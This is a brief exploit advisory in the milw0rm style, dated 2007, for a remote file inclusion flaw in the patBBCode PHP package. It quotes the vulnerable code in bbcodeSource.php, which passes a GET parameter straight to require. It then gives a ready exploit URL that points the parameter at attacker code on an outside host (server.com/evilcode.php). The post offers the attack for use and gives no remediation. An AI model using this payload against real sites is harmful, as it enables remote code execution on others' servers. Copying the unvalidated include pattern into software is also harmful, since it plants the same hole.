Link to download: http://www.php-tools.net/site.php?file=patBBCode/overview.xml Vuln file: examples\patExampleGen\bbcodeSource.php Vuln code: if( !isset( $_GET['example'] ) ) die( 'No example selected.' ); $exampleId = $_GET['example']; ob_start(); // make the example think it's still in the right place chdir( '../' ); // include the example require $exampleId.'.php'; ob_end_clean(); Exploit: examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php # milw0rm.com [2007-11-12]